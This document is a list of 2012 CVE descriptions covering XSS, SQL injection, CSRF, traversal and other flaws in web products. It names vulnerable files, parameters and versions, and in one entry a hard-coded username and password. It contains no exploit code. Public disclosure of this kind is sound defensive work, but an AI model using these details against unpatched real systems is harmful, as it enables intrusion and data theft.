[CVE-2012-5759] The IBM WebSphere DataPower XC10 Appliance 2.0.0.0 through 2.0.0.3 and 2.1.0.0 through 2.1.0.2 allows remote authenticated users to bypass intended administrative-role requirements and perform arbitrary JMX operations via unspecified vectors.
[CVE-2012-5757] Cross-site scripting (XSS) vulnerability in the Web Client in IBM Rational ClearQuest 7.1.x before 7.1.2.10 and 8.x before 8.0.0.6 allows remote attackers to inject arbitrary web script or HTML via a crafted URL.
[CVE-2012-5756] The IBM WebSphere DataPower XC10 Appliance 2.0.0.0 through 2.0.0.3 and 2.1.0.0 through 2.1.0.2, when a collective configuration is enabled, has a single secret key that is shared across different customers' installations, which allows remote attackers to spoof a container server by (1) sniffing the network to locate a cleartext transmission of this key or (2) leveraging knowledge of this key from another installation.
[CVE-2012-5705] Cross-site scripting (XSS) vulnerability in the settings page (admin/settings/hotblocks) in the Hotblocks module 6.x-1.x before 6.x-1.8 for Drupal allows remote authenticated users with the "administer hotblocks" permission to inject arbitrary web script or HTML via the "block names."
[CVE-2012-5687] Directory traversal vulnerability in the web-based management feature on the TP-LINK TL-WR841N router with firmware 3.13.9 build 120201 Rel.54965n and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the PATH_INFO to the help/ URI.
[CVE-2012-5666] Cross-site scripting (XSS) vulnerability in bookmarks/js/bookmarks.js in ownCloud 4.0.x before 4.0.10 and 4.5.x before 4.5.5 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to apps/bookmark/index.php.
[CVE-2012-5665] ownCloud 4.0.x before 4.0.10 and 4.5.x before 4.5.5 does not properly restrict access to settings.php, which allows remote attackers to edit app configurations of user_webdavauth and user_ldap by editing this file.
[CVE-2012-5647] Open redirect vulnerability in node-util/www/html/restorer.php in Red Hat OpenShift Origin before 1.0.5-3 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the PATH_INFO.
[CVE-2012-5629] The default configuration of the (1) LdapLoginModule and (2) LdapExtLoginModule modules in JBoss Enterprise Application Platform (EAP) 4.3.0 CP10, 5.2.0, and 6.0.1, and Enterprise Web Platform (EWP) 5.2.0 allow remote attackers to bypass authentication via an empty password.
[CVE-2012-5608] Cross-site scripting (XSS) vulnerability in apps/user_webdavauth/settings.php in ownCloud 4.5.x before 4.5.2 allows remote attackers to inject arbitrary web script or HTML via arbitrary POST parameters.
[CVE-2012-5606] Multiple cross-site scripting (XSS) vulnerabilities in ownCloud before 4.0.9 and 4.5.0 allow remote attackers to inject arbitrary web script or HTML via the (1) file name to apps/files_versions/js/versions.js or (2) apps/files/js/filelist.js.
[CVE-2012-5591] Cross-site scripting (XSS) vulnerability in the Zero Point module 6.x-1.x before 6.x-1.18 and 7.x-1.x before 7.x-1.4 for Drupal allows remote attackers to inject arbitrary web script or HTML via the path aliases.
[CVE-2012-5590] SQL injection vulnerability in the Webmail Plus module for Drupal allows remote attackers to execute arbitrary SQL commands via unspecified vectors.
[CVE-2012-5587] Cross-site scripting (XSS) vulnerability in the Email Field module 6.x-1.x before 6.x-1.3 for Drupal allows remote attackers to inject arbitrary web script or HTML via the mailto link.
[CVE-2012-5585] Cross-site scripting (XSS) vulnerability in the Mixpanel module 6.x-1.x before 6.x-1.1 in Drupal allows remote authenticated users with the "access administration pages" permission to inject arbitrary web script or HTML via the Maxpanel token.
[CVE-2012-5569] Multiple cross-site scripting (XSS) vulnerabilities in the Basic webmail module 6.x-1.x before 6.x-1.2 for Drupal allow remote attackers to inject arbitrary web script or HTML via a (1) page title or (2) crafted email message.
[CVE-2012-5559] Cross-site scripting (XSS) vulnerability in the page manager node view task in the Chaos tool suite (ctools) module 6.x-1.x before 6.x-1.10 for Drupal allows remote authenticated users with permissions to submit or edit nodes to inject arbitrary web script or HTML via the page title.
[CVE-2012-5556] Multiple cross-site request forgery (CSRF) vulnerabilities in the RESTful Web Services (RESTWS) module 7.x-1.x before 7.x-1.1 and 7.x-2.x before 7.x-2.0-alpha3 for Drupal allow remote attackers to hijack the authentication of arbitrary users via unknown vectors.
[CVE-2012-5554] The default configuration for the Webform CiviCRM Integration module 7.x-3.x before 7.x-3.2 has "Enforce Permissions" disabled, which allows remote attackers to obtain contact information by reading webforms.
[CVE-2012-5553] Multiple cross-site scripting (XSS) vulnerabilities in the OM Maximenu module 6.x-1.x before 6.x-1.44 and 7.x-1.x before 7.x-1.44 for Drupal allow remote authenticated users with the "administer OM Maximenu" permission to inject arbitrary web script or HTML via the (1) Menu Title, (2) Link Title, (3) Path Query, (4) Anchor, or (5) vocabulary names.
[CVE-2012-5551] Multiple cross-site scripting (XSS) vulnerabilities in the MailChimp module 7.x-2.x before 7.x-2.7 for Drupal allow remote attackers to inject arbitrary web script or HTML via vectors related to (1) a predictable "webhook URL key" and (2) improper sanitization of "Webhook variables from POST requests."
[CVE-2012-5548] Cross-site scripting (XSS) vulnerability in the Time Spent module 6.x and 7.x for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-5545] Multiple cross-site scripting (XSS) vulnerabilities in the ShareThis module 7.x-2.x before 7.x-2.5 for Drupal allow remote authenticated users with the "administer sharethis" permission to inject arbitrary web script or HTML via unspecified vectors related to "JavaScript settings."
[CVE-2012-5541] Cross-site scripting (XSS) vulnerability in the Twitter Pull module 6.x-1.x before 6.x-1.3 and 7.x-1.x before 7.x-1.0-rc3 for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "data coming from Twitter."
[CVE-2012-5540] Multiple cross-site scripting (XSS) vulnerabilities in the Hostip module 6.x-2.x before 6.x-2.2 and 7.x-2.x before 7.x-2.2 for Drupal allow remote attackers with control of hostip.info to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-5538] Cross-site scripting (XSS) vulnerability in the FileField Sources module 6.x-1.x before 6.x-1.6 and 7.x-1.x before 7.x-1.6 for Drupal, when the field has "Reference existing" source enabled, allows remote authenticated users to inject arbitrary web script or HTML via the filename of an uploaded file.
[CVE-2012-5531] Multiple cross-site scripting (XSS) vulnerabilities in the GateIn Portal in JBoss Enterprise Portal Platform 5.2.2 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-5478] The AuthorizationInterceptor in JBoss Enterprise Application Platform (EAP) 5.2.0, Web Platform (EWP) 5.2.0, and BRMS Platform before 5.3.1 does not properly restrict access, which allows remote authenticated users to bypass intended role restrictions and perform arbitrary JMX operations via unspecified vectors.
[CVE-2012-5460] Cross-site scripting (XSS) vulnerability in the help page in Juniper Secure Access (SA) with IVE OS before 7.1r13, 7.2.x before 7.2r7, and 7.3.x before 7.3r2 allows remote attackers to inject arbitrary web script or HTML via the WWHSearchWordsText parameter.
[CVE-2012-5455] Cross-site scripting (XSS) vulnerability in the language search component in Joomla! before 3.0.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, related to a "typographical error."
[CVE-2012-5452] Multiple cross-site scripting (XSS) vulnerabilities in Subrion CMS 2.2.1 allow remote attackers to inject arbitrary web script or HTML via the (1) multi_title parameter to blocks/add/
[CVE-2012-5416] Buffer overflow in Cisco Unified MeetingPlace Web Conferencing before 7.1MR1 Patch 1, 8.0 before 8.0MR1 Patch 1, and 8.5 before 8.5MR3 allows remote attackers to cause a denial of service (daemon hang) via unspecified parameters in a POST request, aka Bug ID CSCua66341.
[CVE-2012-5388] Cross-site scripting (XSS) vulnerability in wlcms-plugin.php in the White Label CMS plugin 1.5 for WordPress allows remote authenticated administrators to inject arbitrary web script or HTML via the wlcms_o_developer_name parameter in a save action to wp-admin/admin.php, a related issue to CVE-2012-5387.
[CVE-2012-5385] install/index.php in Craig Knudsen WebCalendar before 1.2.5 allows remote attackers to modify settings.php and possibly execute arbitrary code via vectors related to the user theme preference.
[CVE-2012-5384] Multiple cross-site scripting (XSS) vulnerabilities in Craig Knudsen WebCalendar allow remote attackers to inject arbitrary web script or HTML via the (1) $name or (2) $description variables in edit_entry_handler.php, or (3) $url, (4) $tempfullname, or (5) $ext_users[] variables in view_entry.php, different vectors than CVE-2012-0846.
[CVE-2012-5367] Multiple SQL injection vulnerabilities in OrangeHRM 2.7.1 RC 1 allow remote authenticated administrators to execute arbitrary SQL commands via the sortField parameter to (1) viewCustomers, (2) viewPayGrades, or (3) viewSystemUsers in symfony/web/index.php/admin/, as demonstrated using cross-site request forgery (CSRF) attacks.
[CVE-2012-5354] Mozilla Firefox before 16.0, Thunderbird before 16.0, and SeaMonkey before 2.13 do not properly handle navigation away from a web page that has multiple menus of SELECT elements active, which allows remote attackers to conduct clickjacking attacks via vectors involving an XPI file, the window.open method, and the Geolocation API, a different vulnerability than CVE-2012-3984.
[CVE-2012-5349] Multiple cross-site scripting (XSS) vulnerabilities in pay.php in the Pay With Tweet plugin before 1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) link, (2) title, or (3) dl parameter.
[CVE-2012-5348] SQL injection vulnerability in MangosWeb Enhanced 3.0.3 allows remote attackers to execute arbitrary SQL commands via the login parameter in a login action to index.php.
[CVE-2012-5347] TinyWebGallery 1.8.3 allows remote attackers to execute arbitrary code via shell metacharacters in the command parameter to (1) inc/filefunctions.inc or (2) info.php.
[CVE-2012-5346] Cross-site scripting (XSS) vulnerability in wp-live.php in the WP Live.php module 1.2.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the s parameter. NOTE: some of these details are obtained from third party information.
[CVE-2012-5344] Directory traversal vulnerability in the WebServer (Thttpd.bat) in IpTools (aka Tiny TCP/IP server) 0.1.4 allows remote attackers to read arbitrary files via a .. (dot dot) in a HTTP request.
[CVE-2012-5343] Cross-site scripting (XSS) vulnerability in admin/login.php in Limny 3.0.1 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO, related to the "PHP_SELF" variable.
[CVE-2012-5341] Multiple cross-site scripting (XSS) vulnerabilities in statistik.php in Otterware StatIt 4 allow remote attackers to inject arbitrary web script or HTML via the (1) action parameter, (2) show parameter in a stat_tld action, or (3) order parameter in a stat_abfragen action.
[CVE-2012-5339] Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 3.5.x before 3.5.3 allow remote authenticated users to inject arbitrary web script or HTML via a crafted name of (1) an event, (2) a procedure, or (3) a trigger.
[CVE-2012-5337] Multiple cross-site scripting (XSS) vulnerabilities in jforum.page in JForum 2.1.9 allow remote attackers to inject arbitrary web script or HTML via the (1) action, (2) match_type, (3) sort_by, or (4) start parameters.
[CVE-2012-5330] Multiple cross-site scripting (XSS) vulnerabilities in asaanCart 0.9 allow remote attackers to inject arbitrary web script or HTML via the (1) PATH_INFO to calc.php, (2) chat.php, (3) register.php, or (4) index.php in libs/smarty_ajax/.
[CVE-2012-5325] Multiple cross-site scripting (XSS) vulnerabilities in the scr_do_redirect function in scr.php in the Shortcode Redirect plugin 1.0.01 and earlier for WordPress allow remote authenticated users with certain permissions to inject arbitrary web script or HTML via the (1) url or (2) sec attributes in a redirect tag.
[CVE-2012-5323] Cross-site request forgery (CSRF) vulnerability in webconfig/admin_passwd/passwd.html/admin_passwd in Xavi X7968 allows remote attackers to hijack the authentication of administrators for requests that change the administrator password via the sysUserName, sysPassword, and sysCfmPwd parameters.
[CVE-2012-5322] Multiple cross-site scripting (XSS) vulnerabilities in Xavi X7968 allow remote attackers to inject arbitrary web script or HTML via the (1) pvcName parameter to webconfig/wan/confirm.html/confirm or (2) host_name_txtbox parameter to webconfig/lan/lan_config.html/local_lan_config.
[CVE-2012-5321] tiki-featured_link.php in TikiWiki CMS/Groupware 8.3 allows remote attackers to load arbitrary web site pages into frames and conduct phishing attacks via the url parameter, aka "frame injection."
[CVE-2012-5316] Multiple cross-site scripting (XSS) vulnerabilities in Barracuda Spam & Virus Firewall 600 Firmware 4.0.1.009 and earlier allow remote authenticated users to inject arbitrary web script or HTML via (1) Troubleshooting in the Trace route Device module or (2) LDAP Username in the LDAP Configuration module.
[CVE-2012-5315] Multiple cross-site scripting (XSS) vulnerabilities in php ireport 1.0 allow remote attackers to inject arbitrary web script or HTML via the message parameter to (1) messages_viewer.php, (2) home.php, or (3) history.php.
[CVE-2012-5314] Cross-site scripting (XSS) vulnerability in ViewGit 0.0.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the f parameter.
[CVE-2012-5307] Cross-site scripting (XSS) vulnerability in servlet/traveler in IBM Lotus Notes Traveler before 8.5.3.3 Interim Fix 1, when Firefox is used, allows remote attackers to inject arbitrary web script or HTML via the redirectURL parameter, a different vulnerability than CVE-2012-4824 and CVE-2012-4825.
[CVE-2012-5305] Cross-site scripting (XSS) vulnerability in CMD_DOMAIN in JBMC Software DirectAdmin 1.403 allows remote attackers to inject arbitrary web script or HTML via the domain parameter.
[CVE-2012-5298] Mavili Guestbook, as released in November 2007, stores guestbook.mdb under the web root with insufficient access control, which allows remote attackers to read the database via a direct request.
[CVE-2012-5296] Multiple cross-site scripting (XSS) vulnerabilities in Mavili Guestbook, as released in November 2007, allow remote attackers to inject arbitrary web script or HTML via the id parameter to (1) approve.asp, (2) delete.asp, (3) edit.asp, or (4) edit2.asp.
[CVE-2012-5295] Cross-site scripting (XSS) vulnerability in login.cfm in FuseTalk Forums 3.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the windowed parameter.
[CVE-2012-5290] Multiple SQL injection vulnerabilities in EasyWebRealEstate allow remote attackers to execute arbitrary SQL commands via the (1) lstid parameter to listings.php or (2) infoid parameter to index.php.
[CVE-2012-5234] Open redirect vulnerability in index.php in ocPortal before 7.1.6 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter.
[CVE-2012-5233] Cross-site scripting (XSS) vulnerability in the stickynote module before 7.x-1.1 for Drupal allows remote authenticated users with edit stickynotes privileges to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-5232] Cross-site scripting (XSS) vulnerability in the Quickl Form component for Joomla! allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-5229] Cross-site scripting (XSS) vulnerability in css/gallery-css.php in the Slideshow Gallery2 plugin for WordPress allows remote attackers to inject arbitrary web script or HTML via the border parameter.
[CVE-2012-5228] Cross-site scripting (XSS) vulnerability in admin/index.php in phplist 2.10.9, 2.10.17, and possibly other versions before 2.10.19 allows remote attackers to inject arbitrary web script or HTML via the testtarget parameter. NOTE: some of these details are obtained from third party information.
[CVE-2012-5226] Multiple cross-site scripting (XSS) vulnerabilities in Peel SHOPPING 2.8 and 2.9 allow remote attackers to inject arbitrary web script or HTML via the (1) motclef parameter to achat/recherche.php or (2) PATH_INFO to index.php.
[CVE-2012-5225] Cross-site scripting (XSS) vulnerability in webscr.php in xClick Cart 1.0.1 and 1.0.2 allows remote attackers to inject arbitrary web script or HTML via the shopping_url parameter.
[CVE-2012-5222] HP Service Manager Web Tier 9.31 before 9.31.2004 p2 allows remote attackers to obtain sensitive information via unspecified vectors.
[CVE-2012-5219] Cross-site scripting (XSS) vulnerability in HP Managed Printing Administration (MPA) before 2.7.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-5200] Cross-site scripting (XSS) vulnerability in HP Intelligent Management Center (iMC) and Intelligent Management Center for Automated Network Manager (ANM) before 5.2 E0401 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-5186] Cross-site scripting (XSS) vulnerability in FLUGELz netmania myu-s and PHP WeblogSystem allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-5184] Cross-site scripting (XSS) vulnerability in the Olive Toast Documents Pro File Viewer (formerly Files HD) app before 1.11.1 for iOS allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-5181] Cross-site scripting (XSS) vulnerability in concrete5 Japanese 5.5.1 through 5.5.2.1 and concrete5 English 5.5.0 through 5.6.0.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-5180] The Opera Mobile application before 12.1 and Opera Mini application before 7.5 for Android do not properly implement the WebView class, which allows attackers to obtain sensitive information via a crafted application.
[CVE-2012-5179] The Boat Browser application before 4.2 and Boat Browser Mini application before 3.9 for Android do not properly implement the WebView class, which allows attackers to obtain sensitive information via a crafted application.
[CVE-2012-5177] Cross-site scripting (XSS) vulnerability in the Welcart plugin before 1.2.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-5176] Cross-site scripting (XSS) vulnerability in KENT-WEB ACCESS REPORT 5.02 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors related to tag embedding.
[CVE-2012-5175] Cross-site scripting (XSS) vulnerability in KENT-WEB ACCESS REPORT 4.2 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors related to access-log data.
[CVE-2012-5173] Session fixation vulnerability in BIGACE before 2.7.8 allows remote attackers to hijack web sessions via unspecified vectors.
[CVE-2012-5170] Open redirect vulnerability in Pebble before 2.6.4 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
[CVE-2012-5169] Multiple cross-site scripting (XSS) vulnerabilities in file_manager/preview_top.php in ATutor AContent before 1.2-2 allow remote attackers to inject arbitrary web script or HTML via the (1) pathext, (2) popup, (3) framed, or (4) file parameter.
[CVE-2012-5164] Multiple cross-site scripting (XSS) vulnerabilities in Fork CMS before 3.2.7 allow remote attackers to inject arbitrary web script or HTML via the term parameter to (1) autocomplete.php, (2) search/ajax/autosuggest.php, (3) livesuggest.php, or (4) save.php in frontend/modules/search/ajax.
[CVE-2012-5163] Cross-site scripting (XSS) vulnerability in oc-admin/ajax/ajax.php in OSClass before 2.3.5 allows remote attackers to inject arbitrary web script or HTML via the id parameter in an enable_category action to index.php.
[CVE-2012-5161] The XML Service interface in Citrix XenApp 6.5 and 6.5 Feature Pack 1 allows remote attackers to execute arbitrary code via unspecified vectors.
[CVE-2012-5129] Heap-based buffer overflow in the WebGL subsystem in Google Chrome OS before 23.0.1271.94 allows remote attackers to cause a denial of service (GPU process crash) or possibly have unspecified other impact via unknown vectors.
[CVE-2012-5127] Integer overflow in Google Chrome before 23.0.1271.64 allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via a crafted WebP image.
[CVE-2012-5112] Use-after-free vulnerability in the SVG implementation in WebKit, as used in Google Chrome before 22.0.1229.94, allows remote attackers to execute arbitrary code via unspecified vectors.
[CVE-2012-5105] Multiple cross-site scripting (XSS) vulnerabilities in SQLiteManager 1.2.4 allow remote attackers to inject arbitrary web script or HTML via the dbsel parameter to (1) main.php or (2) index.php.
[CVE-2012-5104] Cross-site scripting (XSS) vulnerability in forums/ubbthreads.php in UBB.threads 7.5.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the Loginname parameter.
[CVE-2012-5103] Multiple cross-site scripting (XSS) vulnerabilities in action/add-submit.php in Ggb Guestbook 0.3.1 allow remote attackers to inject arbitrary web script or HTML via the (1) url or (2) message parameter.
[CVE-2012-5102] Cross-site scripting (XSS) vulnerability in inc/extensions.php in VertrigoServ 2.25 allows remote attackers to inject arbitrary web script or HTML via the ext parameter.
[CVE-2012-5099] Cross-site scripting (XSS) vulnerability in list.php in PHPB2B 4.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the q parameter in a search action.
[CVE-2012-5097] Unspecified vulnerability in the Oracle Access Manager component in Oracle Fusion Middleware 10.1.4.3.0, 11.1.1.5.0, and 11.1.2.0.0 allows remote attackers to affect integrity, related to OAM Webgate.
[CVE-2012-5065] Unspecified vulnerability in the Oracle WebCenter Sites component in Oracle Fusion Middleware 6.1, 6.2, 6.3.x, 7, 7.0.1, 7.0.2, 7.0.3, 7.5, 7.6.1, 7.6.2, and 11.1.1.6.0 allows local users to affect integrity via unknown vectors related to ImagePicker.
[CVE-2012-5062] Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and EM DB Control 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, and 11.2.0.3 allows remote attackers to affect integrity via unknown vectors related to User Interface Framework.
[CVE-2012-5050] Cross-site scripting (XSS) vulnerability in the server in VMware vCenter Operations (aka vCOps) before 5.0.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-5003] nxapplet.jar in No Machine NX Web Companion 3.x and earlier does not properly verify the authenticity of updates, which allows user-assisted remote attackers to execute arbitrary code via a crafted (1) SiteUrl or (2) RedirectUrl parameter that points to a Trojan Horse client.zip update file.
[CVE-2012-4998] Cross-site scripting (XSS) vulnerability in index.php in starCMS allows remote attackers to inject arbitrary web script or HTML via the q parameter.
[CVE-2012-4995] Cross-site scripting (XSS) vulnerability in admin/userrighthandling.php in LimeSurvey before 1.91+ Build 120224 allows remote attackers to inject arbitrary web script or HTML via the full_name parameter in a moduser action to admin/admin.php. NOTE: some of these details are obtained from third party information.
[CVE-2012-4989] Cross-site scripting (XSS) vulnerability in admin/plugin-index.php in OpenX 2.8.10 before revision 81823 allows remote attackers to inject arbitrary web script or HTML via the parent parameter in an info action.
[CVE-2012-4983] Multiple cross-site scripting (XSS) vulnerabilities on the Forescout CounterACT NAC device before 7.0 allow remote attackers to inject arbitrary web script or HTML via (1) the a parameter to assets/login or (2) the query parameter to assets/rangesearch.
[CVE-2012-4982] Open redirect vulnerability in assets/login on the Forescout CounterACT NAC device before 7.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the a parameter.
[CVE-2012-4972] Multiple cross-site scripting (XSS) vulnerabilities in Layton Helpbox 4.4.0 allow remote attackers to inject arbitrary web script or HTML via the (1) sys_solution_id, (2) sys_requesttype_id, (3) sys_problem_desc, (4) sys_solution_desc, (5) sys_problemsummary, (6) usr_Action_testing, (7) usr_Escalation, or (8) usr_Additional_Resources parameter to writesolutionuser.asp or the (9) sys_solution_id parameter to deletesolution.asp.
[CVE-2012-4969] Use-after-free vulnerability in the CMshtmlEd::Exec function in mshtml.dll in Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code via a crafted web site, as exploited in the wild in September 2012.
[CVE-2012-4968] Multiple cross-site scripting (XSS) vulnerabilities in SilverStripe 2.3.x before 2.3.13 and 2.4.x before 2.4.7 allow remote attackers to inject arbitrary web script or HTML via (1) a crafted string to the AbsoluteLinks, (2) BigSummary, (3) ContextSummary, (4) EscapeXML, (5) FirstParagraph, (6) FirstSentence, (7) Initial, (8) LimitCharacters, (9) LimitSentences, (10) LimitWordCount, (11) LimitWordCountXML, (12) Lower, (13) LowerCase, (14) NoHTML, (15) Summary, (16) Upper, (17) UpperCase, or (18) URL method in a template, different vectors than CVE-2012-0976.
[CVE-2012-4955] Cross-site scripting (XSS) vulnerability in Dell OpenManage Server Administrator (OMSA) before 6.5.0.1, 7.0 before 7.0.0.1, and 7.1 before 7.1.0.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-4951] Multiple SQL injection vulnerabilities in terminal/paramedit.aspx in VeriFone VeriCentre Web Console before 2.2 build 36 allow remote attackers to execute arbitrary SQL commands via the (1) TerminalId, (2) ModelName, or (3) ApplicationName parameter.
[CVE-2012-4942] Multiple cross-site scripting (XSS) vulnerabilities in Agile FleetCommander and FleetCommander Kiosk before 4.08 allow remote attackers to inject arbitrary web script or HTML via an arbitrary text field.
[CVE-2012-4933] The rtrlet web application in the Web Console in Novell ZENworks Asset Management (ZAM) 7.5 uses a hard-coded username of Ivanhoe and a hard-coded password of Scott for the (1) GetFile_Password and (2) GetConfigInfo_Password operations, which allows remote attackers to obtain sensitive information via a crafted rtrlet/rtr request for the HandleMaintenanceCalls function.
[CVE-2012-4932] Multiple cross-site scripting (XSS) vulnerabilities in SimpleInvoices before stable-2012-1-CIS3000 allow remote attackers to inject arbitrary web script or HTML via (1) the having parameter in a manage action to index.php
[CVE-2012-4928] Cross-site scripting (XSS) vulnerability in ow_updates/index.php in Oxwall 1.1.1 allows remote attackers to inject arbitrary web script or HTML via the plugin parameter.
[CVE-2012-4923] Multiple cross-site scripting (XSS) vulnerabilities in Endian Firewall 2.4 allow remote attackers to inject arbitrary web script or HTML via the (1) createrule parameter to dnat.cgi, (2) addrule parameter to dansguardian.cgi, or (3) PATH_INFO to openvpn_users.cgi.
[CVE-2012-4912] Cross-site scripting (XSS) vulnerability in the WebAccess component in Novell GroupWise 8.0 before Support Pack 3 and 2012 before Support Pack 1 allows remote attackers to inject arbitrary web script or HTML via a crafted signature in an HTML e-mail message.
[CVE-2012-4907] Google Chrome before 18.0.1025308 on Android does not properly restrict access from JavaScript code to Android APIs, which allows remote attackers to have an unspecified impact via a crafted web page.
[CVE-2012-4905] Cross-site scripting (XSS) vulnerability in Google Chrome before 18.0.1025308 on Android allows remote attackers to inject arbitrary web script or HTML via an extra in an Intent object, aka "Universal XSS (UXSS)."
[CVE-2012-4904] Cross-application scripting vulnerability in Google Chrome before 18.0.1025308 on Android allows remote attackers to inject arbitrary web script via unspecified vectors, as demonstrated by "Universal XSS (UXSS)" attacks against the current tab.
[CVE-2012-4893] Multiple cross-site request forgery (CSRF) vulnerabilities in file/show.cgi in Webmin 1.590 and earlier allow remote attackers to hijack the authentication of privileged users for requests that (1) read files or execute (2) tar, (3) zip, or (4) gzip commands, a different issue than CVE-2012-2982.
[CVE-2012-4892] Multiple cross-site scripting (XSS) vulnerabilities in FlatnuX CMS 2012-03.08 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) title_en, (2) summary_en, or (3) body_en parameter in a submitnews action to the news module, a different vulnerability than CVE-2012-4890. NOTE: the provenance of this information is unknown.
[CVE-2012-4891] Cross-site scripting (XSS) vulnerability in fw/index2.do in ManageEngine Firewall Analyzer 7.2 allows remote attackers to inject arbitrary web script or HTML via the url parameter, a different vector than CVE-2012-4889. NOTE: the provenance of this information is unknown.
[CVE-2012-4890] Multiple cross-site scripting (XSS) vulnerabilities in FlatnuX CMS 2011 08.09.2 and earlier allow remote attackers to inject arbitrary web script or HTML via a (1) comment to the news, (2) title to the news, or (3) the folder names in a gallery.
[CVE-2012-4889] Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do.
[CVE-2012-4873] Cross-site scripting (XSS) vulnerability in the file_download function in GNUBoard before 4.34.21 allows remote attackers to inject arbitrary web script or HTML via the filename parameter.
[CVE-2012-4872] Cross-site scripting (XSS) vulnerability in Tickets/Submit in Kayako Fusion before 4.40.985 allows remote attackers to inject arbitrary web script or HTML via certain vectors, possibly a crafted ticket description.
[CVE-2012-4871] Cross-site scripting (XSS) vulnerability in service/graph_html.php in the administrator panel in LiteSpeed Web Server 4.1.11 allows remote attackers to inject arbitrary web script or HTML via the gtitle parameter.
[CVE-2012-4870] Multiple cross-site scripting (XSS) vulnerabilities in FreePBX 2.9 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) context parameter to panel/index_amp.php or (2) panel/dhtml/index.php.
[CVE-2012-4861] The web server in InfoSphere Data Replication Dashboard in IBM InfoSphere Replication Server 9.7 and 10.1 through 10.1.0.4 allows remote authenticated users to list directories via a direct request for a directory URL.
[CVE-2012-4855] Unspecified vulnerability in the web services framework in IBM WebSphere Commerce 6.0 through 6.0.0.11 and 7.0 through 7.0.0.6 allows remote attackers to cause a denial of service (login outage) via unknown vectors.
[CVE-2012-4853] Cross-site request forgery (CSRF) vulnerability in IBM WebSphere Application Server 6.1 before 6.1.0.45, 7.0 before 7.0.0.25, 8.0 before 8.0.0.5, and 8.5 before 8.5.0.1 allows remote attackers to hijack the authentication of arbitrary users for requests that trigger information disclosure.
[CVE-2012-4851] Cross-site scripting (XSS) vulnerability in IBM WebSphere Application Server 8.5 Liberty Profile before 8.5.0.1 allows remote attackers to inject arbitrary web script or HTML via a crafted URI.
[CVE-2012-4850] IBM WebSphere Application Server 8.5 Liberty Profile before 8.5.0.1, when JAX-RS is used, does not properly validate requests, which allows remote attackers to gain privileges via unspecified vectors.
[CVE-2012-4848] Multiple cross-site scripting (XSS) vulnerabilities in IBM Lotus Foundations Start before 1.2.2c allow remote authenticated users to inject arbitrary web script or HTML via a Webconfig Users user-attribute field, as demonstrated by the (1) First Name or (2) Last Name field.
[CVE-2012-4846] IBM Lotus Notes 8.5.x before 8.5.3 FP3 does not include the HTTPOnly flag in a Set-Cookie header for a web-application cookie, which makes it easier for remote attackers to obtain potentially sensitive information via script access to this cookie, aka SPRs JMAS7TRNLN and SRAO8U3Q68.
[CVE-2012-4844] Cross-site scripting (XSS) vulnerability in the web server in IBM Lotus Domino 8.5.x through 8.5.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-4842] Open redirect vulnerability in the web server in IBM Lotus Domino 8.5.x through 8.5.3 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
[CVE-2012-4836] Cross-site scripting (XSS) vulnerability in IBM Cognos Business Intelligence (BI) 8.4.1 before IF1, 10.1 before IF2, 10.1.1 before IF2, and 10.2 before IF1 allows remote authenticated users to inject arbitrary web script or HTML via a crafted string that is not properly handled during rendering of stored data.
[CVE-2012-4835] Cross-site scripting (XSS) vulnerability in IBM Cognos Business Intelligence (BI) 8.4.1 before IF1, 10.1 before IF2, 10.1.1 before IF2, and 10.2 before IF1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-4834] Directory traversal vulnerability in LayerLoader.jsp in the theme component in IBM WebSphere Portal 7.0.0.1 and 7.0.0.2 before CF19 and 8.0 before CF03 allows remote attackers to read arbitrary files via a crafted URI.
[CVE-2012-4830] Unspecified vulnerability in IBM WebSphere Commerce 6.0 through 6.0.0.11 and 7.0 through 7.0.0.6 allows remote attackers to obtain users' personal data via unknown vectors.
